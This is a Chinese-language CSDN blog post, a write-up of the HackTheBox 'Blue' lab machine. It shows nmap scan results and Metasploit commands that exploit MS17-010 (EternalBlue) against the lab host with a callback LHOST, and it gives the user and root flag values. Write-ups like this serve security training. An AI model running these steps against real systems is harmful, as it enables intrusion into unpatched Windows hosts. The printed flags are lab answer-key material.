[Meachines] [Easy] Blue MS17-010永恒之蓝

于 2024-08-20 16:19:21 发布
阅读量95 收藏 3
点赞数 1
分类专栏: HackTheBox 文章标签: 安全
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/141361608
版权

信息收集

IP AddressOpening Ports
10.10.10.40TCP:135/tcp msrpc, 139/tcp netbios-ssn, 445/tcp microsoft-ds, 49152/tcp msrpc, 49153/tcp msrpc, 49154/tcp msrpc, 49155/tcp msrpc, 49156/tcp msrpc, 49157/tcp msrpc

$ nmap -p- 10.10.10.40 --min-rate 1000 -sC -sV

PORT      STATE    SERVICE      VERSION
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
6093/tcp  filtered unknown
9291/tcp  filtered unknown
16101/tcp filtered unknown
30722/tcp filtered unknown
49152/tcp open     msrpc        Microsoft Windows RPC
49153/tcp open     msrpc        Microsoft Windows RPC
49154/tcp open     msrpc        Microsoft Windows RPC
49155/tcp open     msrpc        Microsoft Windows RPC
49156/tcp open     msrpc        Microsoft Windows RPC
49157/tcp open     msrpc        Microsoft Windows RPC
59607/tcp filtered unknown
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
|_clock-skew: mean: -29m20s, deviation: 34m36s, median: -9m22s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-08-20T07:16:02
|_  start_date: 2024-08-20T07:12:23
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-08-20T08:16:00+01:00

SMB & MS17-010

image.png

$ nmap -p 445 -sC -sV -script vuln 10.10.10.40

image-1.png

$ msfconsole

msf6 > use windows/smb/ms17_010_eternalblue

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40

msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.16.24

msf6 exploit(windows/smb/ms17_010_eternalblue) > set target 1

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

image-2.png

User.txt

66feec35142136aa33d265ca07d7859d

Root.txt

ff8a181bed42f9b18b49ba5690c86cd6

Мартин.
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ms17-010永恒之蓝漏洞复现
xiaosiyue77的博客
05-30 734
ms17-010永恒之蓝漏洞复现
HTB靶机01-Blue-WriteUp
灰蜗牛
04-06 4654
Blue 简介 OS:Windows; 难度:Easy 文章目录Blue 简介WriteUp0.SCAN1. MS17-010 利用他山之石 WriteUp 连接HTB靶场:sudo openvpn xxxx.ovpn 测试靶机连通性: ┌──(xavier㉿xavier)-[~] └─$ ping -c 4 10.10.10.40 PING 10.10.10.40 (10.10.10.40) 56(84) bytes of data. 64 bytes from 10.10.10.40: icm
纯净化安装EasyConnect:macOS Sonoma使用docker安装EasyConnect---docker-easyconnect
篱笆女人和狗的博客
04-25 4623
总结一下,纯净化安装EasyConnect一共三步,第一步是安装docker-easyconnect,第二步是登录vpn,第三步是使用代理软件进行代理转发。安装docker-easyconnect时,需要判断是否要使用图形化界面进行登录,如果需要参考2.1、2.2章节。登录vpn有三种方式,只需要用户名和密码就能登录的直接使用命令行进行登录。如果需要图形验证码,就需要使用web登录或者VNC Viewer登录,两种二选一即可。代理转发可以使用浏览器插件或者clash。
uniapp-uni-easyinput使用
xiaoxian_xian的博客
11-18 6247
uniapp-uni-easyinput使用
使用EasyNVR、easy-player-element.js在web端实现视频直播
小巷陌影
05-21 4309
web端实现直播,将监控视频嵌入系统。摄像头是天地伟业的。各种坑,终于在页面看见直播了。记下吧 准备:easyNVR安装包、easy-player-element.min.js、easy-player.swf、crossdomain.xml。swf需要放置在根目录。该文件是rtmp协议使用。三种协议RTMP, HLS, FLV没毛病。 1、安装EasyNVR将摄像机配置完成,在视频广场可以查看...
EasyDarwin-linux-8.1.0.zip
06-18
标题 "EasyDarwin-linux-8.1.0.zip" 提供了我们正在处理的是一个针对Linux操作系统的EasyDarwin软件的版本,具体是8.1.0。EasyDarwin是一款开源的、基于标准RTSP/RTP协议的实时流媒体服务器系统,它允许用户构建自己...
easy-rsa-old-master.zip
09-29
easy-rsa-old-master.zip . ├── configure.ac ├── COPYING ├── COPYRIGHT.GPL ├── distro │ ├── Makefile.am │ └── rpm │ ├── easy-rsa.spec.in │ └── Makefile.am ├── doc │ ...
EasyDarwin-linux-8.1.0-1901141151.tar.gz.zip
06-18
《Linux系统下安装EasyDarwin 8.1.0指南》 EasyDarwin是一款开源的、基于标准HTTP/RTSP协议的实时流媒体服务器,它为开发者提供了在Linux平台上搭建流媒体服务的强大工具。本文将详细阐述如何在Linux环境下安装Easy...
easy-rsa-2.2.0.tar.gz
06-30
首先,我们需要从源代码包`easy-rsa-2.2.0.tar.gz`中解压并安装。这通常包括解压、进入目录、配置和编译过程。在Unix/Linux环境下,可以使用以下命令: ``` tar -zxvf easy-rsa-2.2.0.tar.gz cd easy-rsa-2.2.0 ./...
EASY-UI示例;EASY-UI示例
09-13
EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例
特洛伊木马:现代网络安全的隐形威胁
最新发布
weixin_48579910的博客
08-16 600
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
漏洞扫描的重要性,如何做好漏洞扫描服务
dexunyun的博客
08-15 851
总之,系统漏洞扫描是守护网络安全的重要防线之一。通过漏洞扫描VSS,丰富的漏洞规则库,可针对各种类型的网站进行全面深入的漏洞扫描,提供专业全面的扫描报告。德迅云安全可以提供有效应对网络安全威胁的解决方案,为用户网络安全提供安全保障。
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 460
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
AI安全-文生图
深度安全实验室
08-15 321
AI安全-文生图
安全工具推荐-Search_Viewer资产测绘】
qq_55213436的博客
08-14 288
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘记查询语法也能方便查看语法,渗透不二之选。
IDS 与 IPS:网络安全的两道防线
hakksjss的博客
08-16 420
然而,IDS 也存在一定的局限性。它就像是网络世界中的“哨兵”,时刻保持警惕,依据一定的安全策略,分析网络数据包、系统日志等信息,试图发现各种潜在的攻击企图、入侵行为以及异常活动。此外,IPS 的误报率也是一个需要关注的问题,如果错误地拦截了正常的流量,可能会影响业务的正常运行。如果确定为攻击行为,IPS 则根据预先设置的规则和策略,立即阻断相关的流量,防止攻击对网络造成更大的破坏。它串联在网络中,实时分析流经的网络流量,一旦发现与已知攻击模式或异常行为相符的流量,立即采取行动,防止攻击的进一步扩散。
NVR方案背景与产品介绍与构建一套完整的NVR产品解决方案
LntonCEC的博客
08-14 727
此外,NVR还可以支持更多的应用场景,由于视频监控系统越来越需要具备扩展性,如果计划在未来增加更多的IP摄像机,那么NVR可能更适合。基于 HiSilicon 平台的 NVR 解决方案凭借其卓越的性能和灵活的功能,已经在市场上占据了一定的份额,并且具有广阔的市场前景。通过友好的管理界面,管理员可以轻松完成用户权限的配置、设备的远程升级、日志的查看与管理等操作。,但都在视频监控中扮演着重要的角色。用户可以通过 GUI 进行摄像机的管理、录像的配置、告警的设置等操作,减少了系统的学习成本,提高了操作效率。
安全密码算法:SM3哈希算法介绍
Angelic_lan的博客
08-16 875
国密算法之一,哈希算法的一种,也是密码杂凑算法。可以将不定长的输入消息message,经过SM3算法计算后输出为32B固定长度的哈希值(hash value)。哈希算法的实质是单向散列函数(one-way hash function),其特点是,输入数据有1bit的改变都有很大概率会产生不同的散列值,因而很多场景中会使用散列值来验证输入消息的完整性。
如何选择较为安全的第三方依赖版本?
极客星云-CSDN博客
08-16 114
本篇博文分享如何选择较为安全的第三方依赖版本的方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值